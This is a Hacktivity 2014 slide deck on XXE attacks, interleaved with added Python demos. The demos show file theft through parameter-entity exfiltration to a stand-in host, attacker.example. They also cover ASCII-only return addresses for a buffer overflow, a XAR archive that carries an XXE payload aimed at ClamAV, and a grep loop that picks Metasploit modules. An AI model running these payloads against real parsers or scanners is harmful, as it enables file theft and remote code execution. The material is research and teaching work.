eXploitable Markup Language


The slide deck from our Hacktivity 2014 presentation about exploiting XML External Entity vulnerabilities.

  1. <?xml version="1.0"?>
     <!DOCTYPE presentation [
       <!ENTITY HacktivityLogo SYSTEM "">
     ]>
     <presentation>
       <logos>&HacktivityLogo;</logos>
       <title>eXploitable Markup Language</title>
       <speakers>
         <speaker Name="Rajtmár Ákos">
           <email></email>
         </speaker>
         <speaker Name="Szakály Tamás">
           <email></email>
           <twitter>@sghctoma</twitter>
         </speaker>
       </speakers>
     </presentation>
  2. Possible Hacktivity topics
     • How secure are today's games?
     • Possible vulns in the EventLog subsystem of recent Windows systems.
     • The security of smart houses.
  3. Well known XML attacks
     • XSLT-related attacks
     • XInclude attacks
     • Entity-based attacks
       • Billion laughs
       • XXE
     Everybody should read "XML Schema, DTD, and Entity Attacks" by VSR.
  4. DON'Ts
     • There are lots of XML-related web application attacks, but the web is not the whole world (not yet, anyway :) )
     • We won't show any new XML vulnerabilities.
  5. DOs
     • Show exciting ways to exploit
     • Deal with the client side
     • Deal with XML derivatives and files with embedded XML parts
       There are tons of these. Often people don't even realize they are dealing with XML.
       Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
  6. XML entities
     • What are "entities" in the XML world?
     • OK, what are "external entities"?
  7. XXE intro
     • Most basic XXE: include resources
     • The app has to display something from the XML
  8. Interesting protocol handlers
     • jar:// (extract a file from a given .jar)
     • file:// (directory listing)
     • php:// with filters (base64-encode a file)
  9. Parameter entities
     • Special type of entity
     • Uses % instead of &
     • More flexible
     • Can declare an external DTD
     • Cannot be used in the XML body
     • XML syntax is not a must, only DTD conformity
  10. Non-XML-conformant content
     combine.dtd:
     <![CDATA[ ]]>
  11. Sending local file content
     • External parameter entity
     • Different protocol handlers: FTP, HTTP, FILE
     • Differences in implementation
     • Out-of-band
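The file read from slides 7 and 8 and the parameter-entity chain from slides 9 to 11, replayed offline as an added example (not the talk's code). It uses Python's bundled expat parser, deliberately configured to resolve every external entity, as a stand-in for a permissive application parser; Python's own XML defaults do not do this. The attacker host http://attacker.example is hypothetical and never contacted: a resolver answers for it from memory and records each URL the parser requests, which is what the attacker's web server log would show. The target file is constructed in a temporary directory. pyexpat is used directly so that each fetched entity can be handed to its sub-parser as one final buffer.

```python
import os
import pathlib
import tempfile
import urllib.parse
import urllib.request
import xml.parsers.expat as expat

ATTACKER = "http://attacker.example"   # hypothetical listener, never contacted

# Slide 7/8 style: an external general entity pulled straight into the body.
READ_PAYLOAD = ('<?xml version="1.0"?>\n'
                '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{file_url}"> ]>\n'
                '<data>&xxe;</data>\n')

# Slide 9-11 style: the document only fetches an attacker DTD. The DTD reads the
# file through a parameter entity; because %file; is expanded inside the entity
# literal, the file content becomes part of the URL that &exfil; then requests.
OOB_PAYLOAD = ('<?xml version="1.0"?>\n'
               '<!DOCTYPE data [\n'
               '  <!ENTITY % dtd SYSTEM "' + ATTACKER + '/evil.dtd">\n'
               '  %dtd;\n'
               ']>\n'
               '<data>&exfil;</data>\n')
EVIL_DTD = ('<!ENTITY % file SYSTEM "{file_url}">\n'
            '<!ENTITY % all "<!ENTITY exfil SYSTEM \'' + ATTACKER + '/collect?d=%file;\'>">\n'
            '%all;\n')


def permissive_parse(document: bytes, served: dict, requests: list) -> str:
    """Parse like an app that resolves every external entity (DTD, parameter
    and general). served maps attacker URLs to bytes, file:// URLs are read
    from disk, and every URL asked for is appended to requests."""
    text = []

    def fetch(url: str) -> bytes:
        requests.append(url)
        if url.startswith(ATTACKER):
            return served.get(url, b"")      # unknown path: listener just logs it
        if url.startswith("file:"):
            path = urllib.request.url2pathname(urllib.parse.urlparse(url).path)
            with open(path, "rb") as fh:
                return fh.read()
        raise ValueError("refusing unexpected URL " + url)

    def arm(parser):
        # Each (sub)parser gets its own handler: %file; inside a literal must be
        # parsed by a child of the parser that is currently inside that literal,
        # because expat only carries the entity-literal state into such children.
        def on_external_ref(context, base, system_id, public_id):
            child = parser.ExternalEntityParserCreate(context)
            arm(child)
            child.Parse(fetch(system_id), True)
            return 1
        parser.ExternalEntityRefHandler = on_external_ref
        parser.CharacterDataHandler = text.append

    root = expat.ParserCreate()
    root.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    arm(root)
    root.Parse(document, True)
    return "".join(text)


def hardened_parse(document: bytes) -> str:
    """Reject any DOCTYPE up front and install no external entity handler."""
    def refuse(*_):
        raise ValueError("DOCTYPE not allowed")
    text = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = refuse
    parser.CharacterDataHandler = text.append
    parser.Parse(document, True)
    return "".join(text)


def demo() -> dict:
    """Run both payloads against both parsers and report what came out."""
    out = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("hunter2")        # constructed target; no newline (see slide 27)
        file_url = pathlib.Path(secret).as_uri()
        read = READ_PAYLOAD.format(file_url=file_url).encode()
        oob = OOB_PAYLOAD.encode()
        served = {ATTACKER + "/evil.dtd": EVIL_DTD.format(file_url=file_url).encode()}

        out["read"] = permissive_parse(read, served, [])
        seen = []
        permissive_parse(oob, served, seen)
        out["listener"] = [u for u in seen if u.startswith(ATTACKER)]
        for name, doc in (("read", read), ("oob", oob)):
            try:
                hardened_parse(doc)
                out["hardened_" + name] = "parsed"
            except ValueError as err:
                out["hardened_" + name] = str(err)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The listener list shows the two requests the attacker would see: the DTD fetch, then a request whose query string carries the file contents. The hardened variant rejects the DOCTYPE before any entity is declared; refusing DTDs outright, rather than filtering URLs, is the check to add to any consumer of untrusted XML.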
  12. XXE meets inter-protocol exploitation
     Requirements:
     • Encapsulation
     • Error tolerance
     Main difficulty: limited character set
     Let's check some XML parsers' badchars:
     • Internet Explorer
       • only ASCII
       • URL-encodes some chars (e.g. space -> %20)
       • cuts newlines
     • Visual Studio
       • URL-encodes every non-alphanumeric char
  13. Trigger BoF via XXE
  14. Alphanum shellcode
     • Restricted to alphanumeric characters (UTF-8 too!!)
     • Metasploit Framework encoders: x86/alpha_mixed, x86/alpha_upper
     • Useful options: BufferRegister, AllowWin32SEH
  15. The payload
  16. qB8w
     Need a "jmp esp" with an ASCII-only address.
     0x77384271 stored little-endian (as x86 writes it into memory) is the byte string "qB8w".
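An added example (not from the talk) that turns the constraints on slides 12 and 16 into a check: pack a candidate return address the way x86 stores it and test whether every byte survives the parser's pass-through character set, then apply the same test to a payload blob. The byte sets are modelled on what slide 12 says about Internet Explorer and Visual Studio; the candidate addresses other than 0x77384271 are constructed for illustration and are not real module offsets.

```python
import struct

# Byte sets that pass through each parser unchanged, modelled on slide 12:
# Internet Explorer keeps printable ASCII but URL-encodes the space and drops
# newlines; Visual Studio URL-encodes everything that is not alphanumeric.
IE_SAFE = set(range(0x21, 0x7F))
VS_SAFE = set(b"0123456789"
              b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
              b"abcdefghijklmnopqrstuvwxyz")


def le_bytes(addr: int) -> bytes:
    """A 32-bit address as x86 stores it in memory (little-endian)."""
    return struct.pack("<I", addr)


def survives(data: bytes, safe: set) -> bool:
    """True when every byte of data is in the parser's pass-through set."""
    return all(b in safe for b in data)


def usable_addresses(candidates, safe: set) -> list:
    """Keep only the jmp esp candidates whose in-memory encoding survives."""
    return [addr for addr in candidates if survives(le_bytes(addr), safe)]


# Constructed candidates (not real module offsets): the talk's 0x77384271,
# one that is printable ASCII but not alphanumeric ("#@[}"), and one whose
# encoding contains a newline and a space.
CANDIDATES = [0x77384271, 0x7D5B4023, 0x7738200A]

if __name__ == "__main__":
    print(le_bytes(0x77384271))                       # b'qB8w'
    print([hex(a) for a in usable_addresses(CANDIDATES, IE_SAFE)])
    print([hex(a) for a in usable_addresses(CANDIDATES, VS_SAFE)])
```

The same `survives` test is what decides whether an alphanumeric encoder (slide 14) is needed at all: run it over the encoded payload with the target parser's byte set before building the trigger.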
  17. Inter-protocol SMTPloitation
     • Pidgin installed, Jabber account configured (accounts.xml)
     • Request external DTD
     • Generate mailer payload
     • Send malicious content
     • Authenticated as the user
  18. Permanent fail?
     Garmin Training Center
       + Not bothering with \n
       - Yet not able to evaluate &variables; (possible implementation issue)
     Visual Studio 2012
       + Able to evaluate &variables;
       - A great fan of URL encoding
  19. Not at all
     • Slight possibility of using Garmin: I believe I saw it working
     • Finding another \n application
     • Visual Studio can be "controlled"
       • Sending multiple files
       • Delivering more attacks
  20. XXE the AV!
     • Original idea: .docx vs. virus scanners
     • Grepped ClamAV's source for "xml"
     • It uses libxml2 to open XAR archives
       • basically an archive format with compressed XML metadata
     • What other AVs know this format?
  21. EICAR string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
     XARed it and sent it to VirusTotal.
     Besides ClamAV, these can deal with XAR:
     AVG, Ad-Aware, Avast, Avira, BitDefender, DrWeb, ESET-NOD32, Emsisoft, F-Secure, Gdata, Kaspersky, NANO-Antivirus, Qihoo-360, nProtect, MicroWorld-eScan
  22. There Can Be Only One
     • AVs use XML parsers without knowledge of DTD
     • Except ClamAV (only recent versions, >= 0.98.1)
     • So let's hack ClamAV!
  23. XAR format
  24. XAR hexdump
  25. PoC
     • Python script to create XARs with custom XML
     • Simple XML with HTTP external entity
     • Scanned it with clamscan...
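An added example of the kind of script slide 25 describes; it is not the talk's own PoC. It builds a structurally valid XAR container around an arbitrary table of contents (the XML metadata slide 20 mentions) and reads the header back, so the layout on the hexdump slide can be checked byte for byte. The TOC below is constructed and points an external entity at the hypothetical host http://attacker.example; whether a given scanner resolves it is what the talk tested, not something this script claims.

```python
import struct
import zlib

# XAR container header: magic 'xar!', header size, version, compressed and
# uncompressed TOC length, TOC checksum algorithm. All fields are big-endian.
XAR_MAGIC = 0x78617221                          # b"xar!"
XAR_HEADER = ">IHHQQI"
XAR_HEADER_SIZE = struct.calcsize(XAR_HEADER)   # 28
XAR_CKSUM_NONE = 0                              # no checksum, so no heap entry is needed


def build_xar(toc_xml: bytes, heap: bytes = b"") -> bytes:
    """Wrap an arbitrary XML table of contents in a XAR container.
    The TOC is zlib-compressed and immediately follows the header; file data
    (the heap) would follow the TOC, but an empty heap is enough here."""
    compressed = zlib.compress(toc_xml)
    header = struct.pack(XAR_HEADER, XAR_MAGIC, XAR_HEADER_SIZE, 1,
                         len(compressed), len(toc_xml), XAR_CKSUM_NONE)
    return header + compressed + heap


def parse_header(blob: bytes) -> dict:
    """Decode the fixed header into named fields."""
    fields = struct.unpack(XAR_HEADER, blob[:XAR_HEADER_SIZE])
    return dict(zip(("magic", "size", "version", "toc_compressed",
                     "toc_uncompressed", "cksum_alg"), fields))


def read_toc(blob: bytes) -> bytes:
    """Return the decompressed TOC after the sanity checks a consumer would do
    before handing the XML to its parser."""
    h = parse_header(blob)
    if h["magic"] != XAR_MAGIC or h["size"] != XAR_HEADER_SIZE or h["version"] != 1:
        raise ValueError("not a XAR header")
    toc = zlib.decompress(blob[h["size"]:h["size"] + h["toc_compressed"]])
    if len(toc) != h["toc_uncompressed"]:
        raise ValueError("TOC length does not match header")
    return toc


# Constructed TOC in the spirit of the talk's PoC: the metadata carries a
# DOCTYPE with an external entity at a hypothetical attacker host, referenced
# from a <name> element so that a parser resolving entities fetches the URL.
POC_TOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xar [ <!ENTITY xxe SYSTEM "http://attacker.example/xar-hit"> ]>
<xar>
 <toc>
  <file id="1">
   <name>&xxe;</name>
   <type>file</type>
  </file>
 </toc>
</xar>
"""


def poc_archive() -> bytes:
    return build_xar(POC_TOC)


if __name__ == "__main__":
    blob = poc_archive()
    print(blob[:XAR_HEADER_SIZE].hex(" ", 4))   # the header, as on the hexdump slide
    print(read_toc(blob).decode())
```

Write `poc_archive()` to a file to get something a scanner will recognise as XAR; everything after the 28-byte header is just zlib data, so any XML at all, DOCTYPE included, reaches whatever parser the consumer uses on the TOC.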
  26. ... and it worked!
  27. &Some haxx0r stuff;
     libxml2 limitation: very strict URI checking (for example, no newlines allowed)
     • OOB attacks are very, very limited: only files without newlines can be stolen.
     SSRF is our Super Mushroom
     • only GET requests
     • only HTTP
     • payload cannot contain non-ASCII chars
  28. Finding suitable exploits
     # ~/msf_http.txt lists the source files of the Metasploit HTTP exploit modules;
     # keep the ones that never mention port 443, POST or SSL (GET-only, plain HTTP).
     while read -r module; do
         if ! grep -q -E -i "443|post|ssl" "$module"; then
             echo "$module"
         fi
     done < ~/msf_http.txt > ~/msf_http_nossl_nopost.txt
  29. linux/http/esva_exec
     linux/http/dreambox_openpli_shell
     linux/http/fritzbox_echo_exec
     linux/http/symantec_web_gateway_lfi
     linux/http/symantec_web_gateway_pbcontrol
     linux/http/ddwrt_cgibin_exec
     multi/http/struts_code_exec
     multi/http/vtiger_install_rce
     multi/http/v0pcr3w_exec
     multi/http/snortreport_exec
     multi/http/spree_search_exec
     multi/http/phptax_exec
     multi/http/gitorious_graph
     multi/http/familycms_less_exec
     multi/http/gestioip_exec
     multi/http/freenas_exec_raw
     multi/http/ajaxplorer_checkinstall_exec
     multi/http/spree_searchlogic_exec
     multi/http/oracle_reports_rce
     multi/http/mobilecartly_upload_exec
     unix/http/freepbx_callmenum
     unix/webapp/cacti_graphimage_exec
     unix/webapp/awstats_configdir_exec
     unix/webapp/barracuda_img_exec
     unix/webapp/invision_pboard_unserialize_exec
     unix/webapp/basilic_diff_exec
     unix/webapp/awstats_migrate_exec
     unix/webapp/google_proxystylesheet_exec
     unix/webapp/base_qry_common
     unix/webapp/tikiwiki_graph_formula_exec
     unix/webapp/mambo_cache_lite
     unix/webapp/awstatstotals_multisort
     unix/webapp/openview_connectednodes_exec
     unix/webapp/php_charts_exec
     unix/webapp/php_vbulletin_template
     unix/webapp/freepbx_config_exec
     unix/webapp/twiki_search
     unix/webapp/twiki_history
     unix/webapp/mitel_awc_exec
     unix/webapp/instantcms_exec
     unix/webapp/redmine_scm_exec
     windows/http/sap_configservlet_exec_noauth
  30. Our choice for the demo: unix/webapp/freepbx_config_exec
  31. Further research
     • Games that use XML for game saves or network communication
       • Skyrim
       • FlightGear
     • XML metadata
       • RDF
     • Binary XML parsers
       • Cwxml
       • OpenEXI
       • EXIficient
       • AgileDelta
       • Windows EventLog format (since Vista)
     • Network Configuration Protocol (NETCONF)
     • XML databases
       • IBM DB2
       • Oracle
       • MSSQL
  32. THX